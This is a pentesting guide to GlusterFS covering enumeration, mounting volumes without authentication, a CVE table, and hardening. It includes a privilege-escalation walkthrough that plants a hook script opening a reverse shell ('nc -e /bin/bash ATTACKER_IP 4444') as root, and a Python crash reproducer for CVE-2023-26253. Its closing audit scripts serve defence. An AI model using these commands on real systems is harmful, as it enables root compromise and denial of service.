24007-24008-24009-49152 - Pentesting GlusterFS


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

GlusterFS is a distributed file system that combines storage from multiple servers into one unified namespace. The management daemon (glusterd) listens by default on 24007/TCP and instructs data-plane bricks that start at 49152/TCP (one port per brick, incrementing). Versions prior to 9.x used 24008–24009/TCP for brick transport, so you will still encounter those ports in legacy clusters.

PORT      STATE  SERVICE        VERSION
24007/tcp open   glusterd       GlusterFS (RPC)
49152/tcp open   gluster-brick  SSL (TLS optional)

Tip: 24007 answers RPC calls even when the storage-only nodes do not export any volume; therefore the service is a reliable pivot target inside large infrastructures.

Enumeration

Install the client utilities on your attacking box:

```bash
sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu
```

1. Peer discovery & health

```bash
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```

2. Volume reconnaissance

```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```

3. Mount without privileges

```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```

If mounting fails, check /var/log/glusterfs/<vol_name>-<uid>.log on the client side. Common issues are:

  • TLS enforcement (option transport.socket.ssl on)
  • Address-based access control (option auth.allow <cidr>)

Certificate troubleshooting

Steal the following files from any authorised client node and place them in /etc/ssl/ (or the directory shown in the error log):

/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca

Known Vulnerabilities (2022-2025)

| CVE | Affected versions | Impact | Notes |
|---|---|---|---|
| CVE-2022-48340 | 10.0–10.4, 11.0 | Use-after-free in dht_setxattr_mds_cbk reachable through the network | Remote DoS and probable RCE. Fixed in 10.4.1 / 11.1. |
| CVE-2023-26253 | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. |
| CVE-2023-3775 | < 10.5 / 11.1 | Incorrect permission validation when mounting gluster_shared_storage | Lets any unauthenticated client mount the admin volume – leads to priv-esc explained below. |

Always check gluster --version on every node; heterogeneous clusters are common after partial upgrades.

Exploiting gluster_shared_storage (Privilege Escalation)

Even in recent versions many administrators leave the special gluster_shared_storage volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run with root on every node.

```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root
```

If hooks/1/ is not present, look for /ss_bricks/ – the exact path may vary with the major version.
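The defender's counterpart to the hook abuse described above is a baseline check of the hook tree: every script that glusterd may execute as root is hashed and compared with a known-good list, so an unbaselined executable such as the dropped `test.sh` stands out immediately. The following is an added example, not code from the original page or from the GlusterFS project; it assumes the `hooks/<version>/<event>/<pre|post>/<script>` layout shown above, takes the hook root and the baseline as parameters, and builds a constructed sample tree in a temporary directory so it runs offline.

```python
#!/usr/bin/env python3
"""Baseline check for a GlusterFS hook tree.

Added example, not from the original page or the GlusterFS project. It assumes
the layout hooks/<version>/<event>/<pre|post>/<script> and a baseline of
SHA-256 digests kept by the operator for the scripts that are supposed to exist.
"""
import hashlib
import os
import stat
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 instead of reading it in one go."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_hooks(hook_root: Path) -> dict:
    """Map each file below hook_root (POSIX relative path) to (sha256, is_executable)."""
    found = {}
    for dirpath, _dirs, files in os.walk(hook_root):
        for name in files:
            path = Path(dirpath) / name
            rel = path.relative_to(hook_root).as_posix()
            executable = bool(path.stat().st_mode & stat.S_IXUSR)
            found[rel] = (sha256_file(path), executable)
    return found


def audit_hooks(hook_root: Path, baseline: dict) -> list:
    """Compare the live tree with baseline {rel_path: sha256}.

    Returns (finding, rel_path, detail) tuples: UNEXPECTED for files absent from
    the baseline, MODIFIED for digest mismatches, MISSING for baseline entries
    that no longer exist on disk.
    """
    findings = []
    current = scan_hooks(hook_root)
    for rel, (digest, executable) in sorted(current.items()):
        if rel not in baseline:
            findings.append(("UNEXPECTED", rel, "executable" if executable else "not executable"))
        elif baseline[rel] != digest:
            findings.append(("MODIFIED", rel, digest))
    for rel in sorted(set(baseline) - set(current)):
        findings.append(("MISSING", rel, baseline[rel]))
    return findings


def build_demo_tree() -> tuple:
    """Constructed sample: one baselined hook plus an unknown executable in
    1/start/post/, mirroring the path used in the walkthrough above."""
    root = Path(tempfile.mkdtemp(prefix="gluster-hooks-demo-"))
    post_start = root / "1" / "start" / "post"
    post_start.mkdir(parents=True)
    known = post_start / "S10-known-good.sh"  # constructed, hypothetical hook name
    known.write_text("#!/bin/bash\nexit 0\n")
    known.chmod(0o755)
    rogue = post_start / "test.sh"  # not in the baseline
    rogue.write_text("#!/bin/bash\necho not in baseline\n")
    rogue.chmod(0o755)
    baseline = {"1/start/post/S10-known-good.sh": sha256_file(known)}
    return root, baseline


if __name__ == "__main__":
    demo_root, demo_baseline = build_demo_tree()
    for finding in audit_hooks(demo_root, demo_baseline):
        print(*finding)
```

Run it from cron on every node against the real hook root and alert on any UNEXPECTED or MODIFIED line; because the shared-storage volume synchronises hooks cluster-wide, a single rogue script shows up on every node, so the check should run per node rather than once centrally.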

Denial-of-Service PoC (CVE-2023-26253)

```python
#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
    s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
    s.send(p.get_buffer())
```

Running the script crashes glusterfsd < 11.0.


Hardening & Detection

  • Upgrade – current LTS is 11.1 (July 2025). All CVEs above are fixed.

  • Enable TLS for every brick:

    ```bash
    gluster volume set <vol> transport.socket.ssl on
    gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
    ```

  • Restrict clients with CIDR lists:

    ```bash
    gluster volume set <vol> auth.allow 10.0.0.0/24
    ```
  • Expose management port 24007 only on a private VLAN or through SSH tunnels.

  • Watch logs: tail -f /var/log/glusterfs/glusterd.log and configure audit-log feature (volume set <vol> features.audit-log on).
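To check the settings above across a whole cluster instead of volume by volume, the output of `gluster volume info all` can be parsed and each volume scored against the three options the list recommends. The following is an added example, not code from the original page or from the GlusterFS project; the sample CLI output is constructed to mimic the `Volume Name:` / `Options Reconfigured:` layout, and the severity labels and the rule that a missing `auth.allow` counts as `*` (the default) are this example's own assumptions.

```python
#!/usr/bin/env python3
"""Audit `gluster volume info all` output for the weak settings listed above.

Added example, not from the original page or the GlusterFS project. It only
checks the options the page itself recommends: transport.socket.ssl,
auth.allow and features.audit-log.
"""

# Constructed sample output, laid out like the real CLI: one exposed
# gluster_shared_storage volume and one volume that follows the checklist.
SAMPLE_OUTPUT = """\
Volume Name: gluster_shared_storage
Type: Replicate
Status: Started
Number of Bricks: 1 x 3 = 3
Transport-type: tcp
Bricks:
Brick1: node1:/bricks/shared
Brick2: node2:/bricks/shared
Brick3: node3:/bricks/shared
Options Reconfigured:
transport.address-family: inet
auth.allow: *

Volume Name: data
Type: Distribute
Status: Started
Number of Bricks: 2
Transport-type: tcp
Bricks:
Brick1: node1:/bricks/data
Brick2: node2:/bricks/data
Options Reconfigured:
transport.socket.ssl: on
transport.socket.ssl-cert: /etc/ssl/glusterfs.pem
auth.allow: 10.0.0.0/24
features.audit-log: on
"""


def parse_volume_info(text: str) -> dict:
    """Return {volume_name: {"status": str, "options": {key: value}}}."""
    volumes = {}
    current = None
    in_options = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Volume Name:"):
            current = line.split(":", 1)[1].strip()
            volumes[current] = {"status": "", "options": {}}
            in_options = False
        elif current is None:
            continue  # ignore anything before the first volume header
        elif line.startswith("Status:"):
            volumes[current]["status"] = line.split(":", 1)[1].strip()
        elif line == "Options Reconfigured:":
            in_options = True
        elif in_options and ":" in line:
            key, value = line.split(":", 1)
            volumes[current]["options"][key.strip()] = value.strip()
    return volumes


def audit_volumes(volumes: dict) -> list:
    """Return (severity, volume, message) findings for each weak setting.

    Assumptions: the admin volume gluster_shared_storage is rated HIGH, other
    volumes MEDIUM, and an absent auth.allow is treated as the default '*'.
    """
    findings = []
    for name, info in sorted(volumes.items()):
        opts = info["options"]
        severity = "HIGH" if name == "gluster_shared_storage" else "MEDIUM"
        if opts.get("transport.socket.ssl", "off").lower() != "on":
            findings.append((severity, name, "TLS not enforced (transport.socket.ssl)"))
        if opts.get("auth.allow", "*").strip() in ("", "*"):
            findings.append((severity, name, "auth.allow permits any client"))
        if opts.get("features.audit-log", "off").lower() != "on":
            findings.append(("LOW", name, "audit log disabled (features.audit-log)"))
    return findings


if __name__ == "__main__":
    # In production, feed the real output: subprocess.run(["gluster", "volume", "info", "all"], ...)
    for severity, volume, message in audit_volumes(parse_volume_info(SAMPLE_OUTPUT)):
        print(f"{severity:6} {volume:24} {message}")
```

Because `gluster volume info` is what an unauthenticated remote client can already read (see the enumeration section), running this audit from the management network gives the same view an attacker would get, which makes it a good periodic check to pair with the log monitoring above.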
